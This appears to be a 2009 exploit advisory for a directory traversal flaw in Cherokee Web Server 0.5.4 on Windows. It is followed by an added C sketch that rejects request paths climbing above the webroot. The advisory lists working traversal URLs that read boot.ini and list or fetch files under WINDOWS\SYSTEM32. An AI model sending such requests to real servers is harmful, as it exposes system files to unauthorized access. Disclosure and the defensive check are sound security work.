
# Title : Cherokee <=0.5.4 directory traversal
# Published : 2009-10-28
# Author : Dr_IDE


############################################################
#
# Cherokee Web Server <= 0.5.4 Directory Traversal Exploit
# Found By:	Dr_IDE
# Tested On:	Windows XPSP3
# Download:	www.cherokee-project.com/download/windows
#
############################################################

- Description -

Cherokee Web Server <= 0.5.4 is a Windows-based HTTP server. This is the latest
version of the application available.

Cherokee Web Server <= 0.5.4 is vulnerable to a remote directory traversal attack by the
following means.

The default webroot is C:\Program Files\Cherokee\www [3 levels deep]; adjust the number of ../ sequences accordingly.

- Technical Details -
http://[webserver IP]/[../]

http://172.16.2.101/../../../boot.ini
http://172.16.2.101/../../../WINDOWS\SYSTEM32 		<- Full Directory Listings through Browser
http://172.16.2.101/../../../WINDOWS\SYSTEM32\calc.exe	<- File access in context of web browser instance

#[pocoftheday.blogspot.com]
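
- Added Example: Server-Side Check -

The requests above succeed because ../ segments are allowed to climb above the webroot. The following C sketch is an added example, not Cherokee code and not part of the original advisory; the function name path_stays_in_webroot is hypothetical and the input is assumed to be already URL-decoded. It tracks directory depth segment by segment and rejects any path that would leave the webroot.

```c
#include <stddef.h>
#include <stdio.h>

/* Both '/' and '\' are path separators on a Windows host. */
static int is_sep(char c) { return c == '/' || c == '\\'; }

/* Hypothetical helper (assumption, not the project's API).
 * Returns 1 if the request path never climbs above the webroot,
 * 0 as soon as a ".." segment would step outside it. */
int path_stays_in_webroot(const char *req)
{
    int depth = 0;                      /* directories below the webroot */
    const char *p = req;

    while (*p) {
        while (is_sep(*p)) p++;         /* skip runs of separators */
        const char *seg = p;
        while (*p && !is_sep(*p)) p++;  /* advance to end of segment */
        size_t len = (size_t)(p - seg);

        if (len == 0) break;            /* trailing separator(s) */
        if (len == 1 && seg[0] == '.') continue;   /* "." keeps depth */
        if (len == 2 && seg[0] == '.' && seg[1] == '.') {
            if (--depth < 0) return 0;  /* would leave the webroot */
            continue;
        }
        depth++;                        /* ordinary name: one level down */
    }
    return 1;
}

int main(void)
{
    /* Constructed sample request paths for illustration. */
    const char *samples[] = {
        "/index.html",
        "/img/../index.html",
        "/../../../boot.ini",
        "/img/..\\..\\boot.ini",
    };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-24s %s\n", samples[i],
               path_stays_in_webroot(samples[i]) ? "serve" : "reject");
    return 0;
}
```

The check must run after percent-decoding and before the path is joined to the webroot; a server should still canonicalize the final path and confirm it begins with the webroot prefix.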